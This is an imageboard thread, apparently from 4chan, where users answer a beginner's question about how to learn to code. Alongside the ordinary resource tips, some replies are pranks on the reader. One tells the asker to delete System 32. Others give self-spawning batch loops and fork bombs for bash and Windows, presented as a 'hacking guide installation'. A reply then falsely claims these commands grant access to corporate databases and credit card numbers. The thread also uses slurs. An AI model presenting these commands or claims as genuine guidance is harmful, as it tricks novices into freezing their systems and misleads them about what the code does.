Where and how do i learn to code?

where and how do i learn to code?

Other urls found in this thread:

codecademy.com/
youtube.com/user/thenewboston
openclassrooms.com/
twitter.com/NSFWRedditGif

you make basic programs and learn how to write statements and learn how to write loops and methods and mess around with arrays. Eventually you will get the hang of it.

this sounds like good advice for a 12 year old who has years to garner knowledge.

OP I would consider signing up for a course because if you're old enough to be on Sup Forums (kek) you need to get this thing going if you want to be marketable.

From books, personal experience, or taking a course or class somewhere.

Try youtube for starters.

That's like asking "how do I learn to run a country" or "how do I learn how to build a spacecraft" though.

That's a broad fucking question and the devil is in the details, and there are a lot of them.

I mean do you want to work with micro-controllers?
Web development?
App development?
What language will you be working in?
What IDE will you be using?
Will you even be using one?
Do you already know what all of these things are?

I mean you can no shit start with nothing but notepad on windows (or some text editor) and just write javascript shit that you run locally in your own browser... but if you don't need/want javascript that doesn't help much.

codecademy.com/

The first thing you need to do is delete system 32.

while(1){
op.suckDick();
}

Nice .net faggot

Java / .net

They are extremely similar

School.

No, no code academy. Too many of you faggots learn through places like that but don't have a grasp on real CS.

irc.darkscience.net #darkscience

For learning basics i think code academy/avengers ok. They teach pretty basic conventions even if a lot of it is just copy paste hold my hand through this exercise.

don't use dark theme. it's bad for your eyes. you'll look like a wannabe hacker faggot.

Youtube. I started from youtube.com/user/thenewboston

w3schools.com
youtube
google
stackoverflow if ya got any problems
experience & time
code basic shit and after a time it will be like nothing for you till yo get pro

:loop
start %0
ping 127.0.0.1
goto loop

while true
do
ping 127.0.0.1
done

Look up some good videos of c++ dX

>OOP
kys homo

Best way is codeacademy, Bucky Tutorials on Youtube (search thenewboston programming) also after you know some basics just fucking around and trying things helps you learn

How do you know it's not a struct with function calls?

The morgue, hang self, add me to last will and you will code

Very true. What annoys me are people who pretty much stop there.

go to school retard

I'm so sorry

If you wanna do it profesionally: Find a local university
If you don't check out the internet and lern by doing.
If you wanna do it profesionally but aren't qualified for a university: get a degree that makes you qualified.
If you can't make that accept that you're too dumb for it.

Not sure how good that is but:
openclassrooms.com/
Should exist in FR/EN/SP

> if typeof winow.width == 'number'
but why

I guess that's the kind of crap you have to deal with if you use a language with weak typing.

OFFICIAL HACKING/PROGRAMMING GUIDE INSTALLATION:

Mac/Linux:
type the following in terminal
:(){:|:&};:

Windows:
type the following in cmd:
echo %0^|%0 > install.bat
install.bat

You should get instruction from there

Can confirm. Doing this will give you read/write access to a bunch of large databases (Google, Sony, Microsoft, etc). Basically, you can do whatever you want, like get credit card numbers, doxx people and create fake identities for yourself. It's a hackers dream, and only a few of them even know about this vulnerability.

You don't get it. I know functional purpose behind this. But i can't imagine situation where window.innerWidth could containt anything except number. It may be possible to be undefined also. But something else?

Who knows? I don't write much javascript. I suppose some weird shit might happen if window == null, but I'd expect that to throw an exception or something.